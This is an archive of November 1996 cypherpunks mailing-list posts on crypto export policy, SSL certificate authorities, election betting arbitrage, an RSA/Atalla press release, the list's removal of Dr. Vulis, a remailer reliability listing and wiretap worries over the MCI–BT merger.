>From IEEE Software, Nov, 1996, page 103, 2nd column:

"Key Decisions Likely On Encryption Exports" by Stephen Barlas

    In fact, should he win, Clinton may go on the offensive.
    Goodlatte, whose bill is the House companion (HR 3011) to the
    Burns bill, said the Clinton administration told him that if the
    computer industry does not agree to a key management
    infrastructure, the President will seek legislation forcing
    Americans to use only encryption to which the government has
    access.

Of course, this intention (to outlaw all non-GAK/KRAP) has been the
desires of FBI/CIA/NSA all along, so no big surprise.  I just would
hate to see Congressional leaders cave in because of the "threat" of
the administration's bozos attempting to introduce more restrictive
legislation.  The old "if we want 5, we demand 10, and we'll get 5 in
the compromise" plan is really screwy and dishonest.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <osquigle@midway.uchicago.edu>
Date: Sun, 3 Nov 1996 21:15:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: free SSL CAs?
Message-ID: <Pine.GSO.3.95.961103231441.3151I-100000@kimbark.uchicago.edu>
MIME-Version: 1.0
Content-Type: text/plain



Are there any free Certificate Authorities for SSL?
I've got a Stronghold server running, and I don't particularly want to pay
Verisign/Thawte's high prices, but I do want to be able to do real SSL.
I've set up my own CA, and given myself my own cert., but having the same
server you're interacting with being the one that's the CA for the
transaction leaves the setup open to man-in-the-middle attacks (I'd think,
at least...).

So, who do I turn to for a cert.?  I don't need amazingly trusted or
trustworthy security -- maybe just some third party whose site is unlikely
to have been compromised, etc...

Please respond by email: I've moved to coderpunks, and so won't see
replies on cypherpunks.

thanks,
-sq






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sun, 3 Nov 1996 20:14:57 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Looking for post on possible Law Articles
In-Reply-To: <199611010310.VAA16259@mail.execpc.com>
Message-ID: <Pine.SUN.3.95.961103231739.2327O-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.law.miami.edu/~froomkin/seminar

might be what you mean?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 3 Nov 1996 21:59:37 -0800 (PST)
To: hallam@ai.mit.edu
Subject: Re: FDA_dis
In-Reply-To: <9611040111.AA08631@etna.ai.mit.edu>
Message-ID: <199611040615.AAA06232@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Without wishing to respond in detail to Hayes's drivel I'll just
> point out that Shell's involvement with Nigeria is hardly beyond
> question. It doesn't take a genius to realise that sanctions 
> against Nigeria would hurt Shell's interest. Perhaps its just
> me but I don't consider it altruism when a company acts in its
> own interests. 

     I don't consider altruism an intelligent trait--at least as you seem to
send define altruism. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Mon, 4 Nov 1996 00:35:14 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: anonymous oddsman
Message-ID: <1.5.4.32.19961104083318.005ed560@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>What I do is the following: I go to the Ladbroke's and offer to pay the
>gamblers not $6, but $6.01 if Dole wins. Being somewhat rational, these
>traders gamblers see a better deal than Ladbroke's offers, and
>give me their $1 bills. This is very simple.
>I take their $1 bills and run to "William Hill", where I take another
>side of the bet. 
> In particular, I buy $6.01 / $10.00 bets for each dollar that I receive.
> The remaining money $1(1-6.01/10) I simply take to my bank.


Ah.  If you can exploit\\\\\\\ provide arbitrage services for these folks,
go ahead.  You'd probably need to offer them $7-8 to deal with
the difference in reputation between you and Ladbroke's, 
but assuming you can get customers and nobody breaks your legs, you do win.
One reason the market isn't more efficient is that it's only being 
played once, and the odds are pretty lopsided, since Dole really has no chance.
What's more interesting is that Ladbroke's aren't doing this themselves -
if they're not.  In a repeated game, or a closer one, the odds would probably
tend to be the same at both houses.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Sun, 3 Nov 1996 21:50:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Press Release: Atalla Agreement with RSA
Message-ID: <3.0b36.32.19961104004902.006b6b10@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


ATALLA INKS AGREEMENT WITH RSA DATA SECURITY INC. TO
PROVIDE OPEN CRYPTO-API FOR NEW SET INTERNET PAYMENTS TOOLKIT

Atalla's PayMaster Internet Security Processor (ISP)
will provide enhanced SET performance and secure key
management capabilities for new RSA toolkit-based applications

SAN JOSE, CA -November 4, 1996- Atalla, a Tandem Company
(r), today announced that it has signed an agreement with RSA
Data Security Inc., to develop an open Application Programming
Interface (API) that will become a key component of RSA's new
SET payments toolkit. The suite of tools from RSA is being built
to enable developers to deploy secure SET-capable applications
quickly, with transparent access to the strongest commercial
Internet security functionality.

The new API developed by Atalla, will access the
command set to Atalla's PayMaster Internet Security Processor
(ISP) product to accelerate SET protocol performance and to
manage cryptographic keys securely. The new SET Toolkit suite
from RSA is designed to provide banks, cardholders, merchants
and application providers with the ability to deploy secure SET-
based applications without specialized cryptographic expertise.
Atalla will be one of seven companies that will support the RSA
SET toolkit. The other companies are Open Market Inc., NEC,
Netscape, Tandem Computers Inc., Verifone and Verisign.

The SET protocol specifies how cardholders, merchants,
issuing banks and acquiring banks will interact to ensure secure
payment processing over the Internet. SET relies on specially
developed encryption technology from RSA Data Security Inc.,
and has been adopted by Visa and MasterCard to secure credit card
transactions, authorization and settlement information over
public networks such as the Internet.

"The development of the SET protocol was an important
milestone in securing commerce over the Internet." said Robert
Gargus, president and general manager of Atalla.  "We believe
that the combination of new, RSA-based SET  tools and the strong
security functionality and high throughput provided by our Atalla
PayMaster Internet Security Processor will now help transform
public networks such as the Internet, into a secure, high-
performance payments infrastructure that banks, merchants and
cardholders will trust."

"We consider integration with the Atalla PayMaster ISP a
critical feature of the RSA SET developer's suite," said Jim Bidzos,
president of RSA Data Security, Inc.  "The Atalla PayMaster, in
combination with RSA,  will now allow for cost-effective, high-
volume SET application servers through greatly improved
performance for the underlying cryptography and strong physical
protection for private keys.  We believe this will overcome a
major barrier to the adoption of secure electronic commerce on
the Internet."

Atalla's PayMaster ISP product was designed specifically to
manage the cryptographic requirements specified by the SET
protocol.  The protocol requires multiple public key operations for
each SET transaction.  The Atalla PayMaster ISP product offloads
these computationally-intensive tasks from server CPUs and
isolates private information intended solely for merchants from
private information intended solely for banks. This ensures that
data cannot be altered at any point in the network, and accelerates
the required SET -specified public-and-private key operations.
Atalla's PayMaster ISP also provides RSA and DES-based
cryptography to provide a high-performance bridge from the
Internet to private networks such as the Bank Payments network.

About Atalla (a Tandem Company)
Atalla (a Tandem Company) brings nearly 25 years of
experience securing commerce over private networks to the public
networks and the Internet/Intranet arena. The company's
products include industry-leading hardware-based security
processors for the Internet, Intranet and the bank transfer
networks, POS/POE (point-of-sale/point-of-entry) credit /debit
payment terminals, customer authorization and PIN selection
terminals, and secure enrollment products for banking, retailing
and government applications. An estimated 70 percent of all ATM
transactions in North America (estimated value: $1.4 trillion
daily) are secured by Atalla's specialized security processor
products. Atalla is headquartered at 2304 Zanker Road, San Jose
CA 95131. Phone: (408) 435-8850. Fax (408) 435-1116. The company's
website is located at www.atalla.com.

Tandem, Atalla, PayMaster, and the Tandem logo are trademarks
or registered trademarks of Tandem Computers Incorporated in
the United States and/or other countries. All other brand names
are trademarks or registered trademarks of their respective
companies.

 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |     PGP 2.6.2 public key available at http://home.pb.net/~gcg      |
 |          and on a plethora of key servers around the world.          |
 |                          Key ID = 0E818EC1                           |
 |   Fingerprint =  A6 7B 67 D7 E9 96 37 7D  E7 16 BD 5E F4 5A B2 E4    |
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 3 Nov 1996 23:14:29 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: anonymous oddsman
In-Reply-To: <199611040431.WAA16905@manifold.algebra.com>
Message-ID: <Pine.BSF.3.91.961104010409.8087C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> 
> It is these people together with "William Hill" whom we exploit.
> 
> What I do is the following: I go to the Ladbroke's and offer to pay the
> gamblers not $6, but $6.01 if Dole wins. Being somewhat rational, these
> traders gamblers see a better deal than Ladbroke's offers, and
> give me their $1 bills. This is very simple.
> 
> I take their $1 bills and run to "William Hill", where I take another
> side of the bet. 
> 

Or Ladbroke's takes their bet for $6, and goes to Willaim Hill, and takes 
out a bet ...  :)

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>moderators@uunet.uu.net (Anonymous Remailer)
Date: Mon, 4 Nov 1996 18:35:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: [CRYPTO] Death of USENET Cabal Predicted, Film at 11
Message-ID: <9611040620.AA02296@cow.net>
MIME-Version: 1.0
Content-Type: text/plain



               VICTORY _____________________^_.
             KOOKS RULE            CANCELBOT|..`.
            SPAM IS GOOD            SPAMBOT |...= s P a M  O==-o    <- Cabal
           FUCK THE CABAL          GRUBORBOT|...~           \ |\
          HAIL  DR. GRUBOR------------------v~~            ~~ 
           DEATH TO UUNET          
            DRG CJ3 AGA`           
               BOURSY`  `            
                DLV`  `            




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Sun, 3 Nov 1996 17:15:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: anonymous oddsman
In-Reply-To: <199611022039.OAA04636@manifold.algebra.com>
Message-ID: <Pine.HPP.3.91.961104015509.23465A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Nov 1996 ichudov@algebra.com wrote:

> >         | Clinton | Not currently offered by either |
> >         | Dole    |     6:1        |     10:1       |
> 
> Whew! They are wide open for arbitrage! Suppose that at Ladbroke I sell
> an obligation to pay $6 if Dole wins (they are apparently valuing it for
> this much), collecting $1. At the same time, to hedge my exposure, I go
> to "William Hill", and purchase their obligation to pay _me_ $10 if Bob
> Dole wins, paying the $1 bill that I just got at Ladbroke's.

The problem is that Ladbroke won't take your offer, they don't
work that way. If they wanted to insure against a Dole victory
they would place some of the money they got from betters on Dole
at William Hill, at 10:1, instead of taking your offer at 6:1.
But probably they get too few bets on Dole to bother with insurance;
they do take risks. Another way of insuring themselves would have
been to offer 11/10 or something on Clinton but obviously they
don't feel they have to do that.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Robinson <joe@connect.ab.ca>
Date: Mon, 4 Nov 1996 01:27:25 -0800 (PST)
To: Cypherpunks@toad.com
Subject: [NOISE] Censorship of Dr. Vulius
Message-ID: <2.2.32.19961104092840.006fda90@portal.connect.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain


I regret that after lurking for so long my first post is related to this....

Sandy Sandfort <sandfort@crl.com> wrote:
>
> The short answer is, No.  More specifically, we constantly have
> a stream of new readers sampling Cypherpunks.  Some are 
> technically sophisticated; some are not.  In either case, new
> readers do not have the historical perspective not to fall for
> Dimitri's big lies.  Nor do they have any way of know what an
> abberation his sort of behavior is on this list.  "So this is
> what Cypherpunks are like," would be a sad, but understandable
> misinterpretation of what we're all about.  What John did was 
> appropriate.

        While it is true that Cypherpunks IS a much sampled list, it's my
opinion that the distribution in the level of education among subscribers is
rather skewed.  I therefore believe that the "average" subscriber to this
list would be intelligent and competent enough to form their own conclusions
regarding the validity of the opinions expressed by anyone.
        I like to believe that the labels I assign to groups are based on a
representative sampling of the given population, not by the sampling a
select few.  It's again my opinion that if others can't do that, and
<cliche>judge books by their covers</cliche>, it's their loss.

and Greg Broiles <gbroiles@netbox.com> mentioned:
> [relevant, well thought-out stuff snipped]
>
>Given that John Gilmore is the source of the oft-repeated "The net sees
>censorship as damage and routes around it" quote, it strikes me as unlikely
>that he took the steps he did without some reflection on their meaning,
>consequences, and chances of success.

        I'm sure that the decision wasn't made hastily or lightly.  It
doesn't change anything though - the damage is done.  If even one person
doubts the credibility or integrity of either John or the list, then Dr.
Vulius has won.

and finally, Declan McGullagh <declan@eff.org> said:
>
>With the right to speak freely comes the right to decline to speak. John, 
>as the owner of the computer maintaining the cypherpunks list, has the 
>right to decline to speak and to kick off a user who violates the 
>covenant of the mailing list.
>
>The kicked-off user has the right to start his own mailing list with
>different standards. If he likes, he can establish the rules as a type of
>contract to which participants must agree. And observers can criticize
>either or both of them. 
>
>Is this censorship, double standards, and hypocrisy? I think not.

        The problem lies in determining who defines the protocols and
punishments, especially on a list such as this.  For someone who espouses
freedom of speech to arbitrarily censor someone is indeed hypocritical.  

        I'm not defending Dr. Vulius - for some time now, he and a number of
others have been filtered into my Humour mailbox.  I'm just spewing off
about having the _choice_ to ignore him or not, as _I_ see fit, you know - 

"... and then they came for me, and there was no one left to speak out."



JR






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 4 Nov 1996 04:45:49 -0800 (PST)
To: Will French <wfrench@interport.net>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611032354.SAA01354@interport.net>
Message-ID: <Pine.SUN.3.91.961104044408.13104A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Libertarianism is not incompatible with strict regulations, as long as 
the rules violate nobody's rights.

-Declan


On Sun, 3 Nov 1996, Will French wrote:

>   Except it's not very effective, is it, since he's still
> posting flames?  In any case, it's an admission on John
> Gilmore's part that libertarianism can't work without some
> measure of authoritarianism; the only argument is over _just how
> much_ authoritarianism we need.
>   
>   I'm quite upset about this.  Up to now I was able to tell
> people that "there is at least one mailing list on the net that
> functions in a completely open manner".  No more.
> 
> 
> Will French  <wfrench@interport.net>
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Mon, 4 Nov 1996 02:04:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks
Message-ID: <199611041004.FAA84350@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Nov 04 17:04:13 1996
Mark wrote:

> It's only authoritarianism if the government is involved.  Clearly, the
> government isn't involved in this matter.

Indeed. IMNSHO, a self-governing property-owner (John) saw that the value of 
a piece of his property was being reduced by a person (Vulis, KOTM) camping 
there. He asked that person (many times, and no-doubt in a far more tolerant 
way than _any_ government has ever in history behaved with any rulebreaker) 
to "please use the latrine instead of the stream." The person not only 
refused, he said "you'll have to make me." The property owner made him. Most 
of the other campers, even those who (like me) choose to (and are able to) 
filter stream water before drinking it, breathed a sigh of relief.

John's action had about as much to do with "censorship" as AFDC has to do 
with "charity" or "compassion." The growing misuse of the word "censorship," 
especially here, is another symptom of the annoying educational work that 
Libertarians need to do, constantly, to fight the ever-encroaching Newspeak 
of those who do not believe in individual property rights, like the one 
(exclusion) that John exercised, only after much provocation. If you don't 
like it, tough shit. Go "buy your own campground" and start your own list, 
just like Perry is. But please don't mislabel John's action "Libertarian 
censorship."
JMR


One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
jmr@shopmiami.com
____________________________________
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMn5oYW1lp8bpvW01AQF6ewP/U8DZc3FXuKgRQXF+mwWhVkimauwEXQYm
p/Rd2u2sYvPMuQD3QMaN+WQCgkpOu0mLlt6TU0n+VJpVYkg82rSHDFyoez71bwvv
jPEXZoJ7dVNnBUpy8b0z+NPSyRzVCPlRaFmaJE1Yba6wV01PMkMHf5ouobUps4L0
7cFlrfBGQaw=
=J5FK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Mon, 4 Nov 1996 03:40:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: MCI/BT, who gets the taps?
Message-ID: <Pine.GSO.3.95.961104063825.28348A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Long-distance telecommunications carriers have been in bed with
governments since Samuel F. B. Morse strung a line into DC.  Only 
a modest amount of cynicism is required to think that there are
"wiretap" hooks in the carriers' systems.  When an MCI merges
with a Britsh Telecom, who gets the benefit of the hooks?

bd


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmT3y680j2q8tTgtAQGC7wQA2ris5C3KAD6qLy3AmtglJRoZrei72CIH
MEm7DGasD4AXqfwkjdmvZScAVXRD+KHHgVZQKQp+H0+D/TWHZCN9nrwE1z5/j73R
o8qXDCC0owwJabZHknOMwpBm4Sf6JUGs7Wm1K9JmpVlF01GP+z7rxOMXfvZrlxvy
mwcK3wjIPCU=
=PTmz
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 4 Nov 1996 06:53:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199611041450.GAA31972@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp pgponly hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The winsock remailer does not accept plaintext messages.

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 4 Nov 96 6:49:04 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          ************    14:34  99.99%
winsock  winsock@c2.org                   --.--+-----   5:02:13  99.84%
squirrel mix@squirrel.owl.de              +++---++---   2:35:51  99.76%
lead     mix@zifi.genetics.utah.edu       +++++++- ++*    37:17  99.62%
extropia remail@miron.vip.best.com        -.------.--  10:08:19  99.60%
lucifer  lucifer@dhp.com                  +++++++++ +     41:39  99.31%
replay   remailer@replay.com              +******+++**     7:48  99.16%
balls    remailer@huge.cajones.com        ******** ***     5:25  98.82%
exon     remailer@remailer.nl.com         *##* **++# #     1:51  98.59%
middle   middleman@jpunix.com             + +++ -  +-   1:34:45  98.17%
cyber    alias@alias.cyberpass.net        +***** +   *    34:08  98.12%
dustbin  dustman@athensnet.com            +-++-+-- --   1:22:20  97.96%
haystack haystack@holy.cow.net            #+****-++#       3:00  86.77%
mix      mixmaster@remail.obscura.com               ++  1:30:30  47.85%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 4 Nov 1996 04:00:13 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: British Telecom merger with MCI
Message-ID: <199611041159.GAA21112@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone figured out how this merger can work, particularly when
British Telecom will be the surviving party, when those MCI employees
concerned with the security of communications will not be able to
disclose any cryptographic software or technical data to their
employer, or to their ``foreign'' bosses and colleagues, without first
getting permission from the Office of Defense Trade Controls under
the ITAR?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
		     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 4 Nov 1996 07:09:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <3.0b28.32.19961103181709.0071c978@mail.io.com>
Message-ID: <327E0677.6618@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:
> At 03:08 PM 11/3/96 -0800, blanc <blancw@cnw.com> wrote:
> >Vulis did everything to set himself up for what he got, did he not.

Am I missing something, or do some people just not get it?

Nobody cares about the "Doctor" other than his personal friends, which cypherpunks as
a list is not.

What *does* matter is what this issue did to everyone else.

Remember the old adage, regurgitated frequently by USA Today, L.A. Times, etc.?
"x number of people are willing to give up some of their freedoms to stop crime" ad
nauseam, even though it says further on in the paragraph that "it probably won't do
any good anyway".  Yes, they actually print that crap.

So now cypherpunks is in the same boat.  Enacting censorship that doesn't accomplish
the stated purpose.  So if it doesn't accomplish the stated purpose, and Doctor Vulis
can post anyway, what was the *real* reason, or to look at it another way, what's the
next thing to be enacted to further tighten the screws on the "Doctor", and add more
limits to freedom?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 4 Nov 1996 07:20:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks [RANT]
In-Reply-To: <19961104044209687.AAA199@localhost>
Message-ID: <327E09AF.489E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adamsc wrote:
> On Sun, 3 Nov 1996 18:54:16 -0500 (EST), Will French wrote:
> >  Except it's not very effective, is it, since he's still
> >posting flames?  In any case, it's an admission on John
> >Gilmore's part that libertarianism can't work without some
> >measure of authoritarianism; the only argument is over _just how
> >much_ authoritarianism we need.
> >  I'm quite upset about this.  Up to now I was able to tell
> >people that "there is at least one mailing list on the net that
> >functions in a completely open manner".  No more.

> This has been taken far too seriously.  Cypherpunks is a *PRIVATE* list.
> There is no obligation to accept anyone.

Isn't this the same argument used by the state whenever they want to differentiate
between your "rights" and your "privileges"?  Can they reject one of your privileges
whenever they want to, at their discretion?  No.

So if c-punks is really "private", how does it decide (arbitrarily?) who to include
and who to reject?

Note that I'm not saying that it's absolutely wrong to reject anyone, at any time
necessarily, I just don't think your last sentence about a *private* list was well
thought out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 4 Nov 1996 04:36:53 -0800 (PST)
To: shamrock@netcom.com (Lucky Green)
Subject: Re: free SSL CAs?
In-Reply-To: <Pine.3.89.9611032210.A14631-0100000@netcom9>
Message-ID: <199611041233.HAA09734@homeport.org>
MIME-Version: 1.0
Content-Type: text


Lucky Green wrote:

| I don't think that their CA software is free, but they do have a free demo 
| version. http://www.xcert.com

SSLeay provides CA tools.

Adam


-- 
"Every year the Republicans campaign like Libertarians, and then go to
Washington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 4 Nov 1996 08:12:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
In-Reply-To: <199611040630.WAA02244@netcom6.netcom.com>
Message-ID: <4cDVwD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:
> [John Gilmore]  has said to Dr.
> Vulis, "You are no longer a member of the cypherpunks community."

I recall we've been through this over a year ago, when I saw an announcement
of a cypherpunks physical meeting where someone was excluded for his political
views, and I said that I don't consider myself a cypherpunk. I'm glad that
John and Bill, the auhorities on cypherpunk membership, finally concur.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Patrick Elam" <patelam3@mindspring.com>
Date: Mon, 4 Nov 1996 05:35:34 -0800 (PST)
To: Brad Dolan <bdolan@USIT.NET>
Subject: Re: MCI/BT, who gets the taps?
Message-ID: <1.5.4.16.19961104133718.4c8724c8@pop.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Maybe the "wiretap" hooks in the carriers' systems are accessable
more globally than they would wish us to believe.

Pat.
At 06:40 AM 11/4/96 -0500, you wrote:
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Long-distance telecommunications carriers have been in bed with
>governments since Samuel F. B. Morse strung a line into DC.  Only 
>a modest amount of cynicism is required to think that there are
